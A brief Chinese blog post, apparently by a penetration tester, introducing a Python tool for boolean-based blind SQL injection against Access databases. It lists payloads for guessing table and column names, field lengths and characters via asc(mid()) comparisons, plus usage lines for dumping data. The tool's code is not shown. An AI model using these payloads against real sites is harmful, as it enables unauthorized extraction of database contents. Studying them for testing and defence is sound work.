ACCESS注入之逐字猜解法-Python工具

今天遇到一个站点,明显有sql注入,但是sqlmap就是跑不出来,测试可以用逐字猜解法法来进行注入,因此写这个工具,节约手工时间。

前置知识

1
2
3
4
5
6
7
8
9
10
获取表名:
and exists (select * from 表名)
获取列名:
and exists (select 列名 from 表名)
获取列名的长度:
and (select top 1 len(列名) from 表名)>=5
获取 第一位编码:
and (select top 1 asc(mid(列名,位数,1)) from 表)>=97
获取 第二位编码:
and (select top 1 asc(mid(列名,位数,1)) from 表)>=100

工具实现

用法及效果展示

注入表名:sql-injection.py -u url --tables --keyword=true_keywoed
注入列名:sql-injection.py -u url -T table_name --columns --keyword=true_keywoed
注入数据:sql-injection.py -u url -T table_name -C col1,col2 --dump --keyword=true_keywoed

代码地址

ACCESS-Injection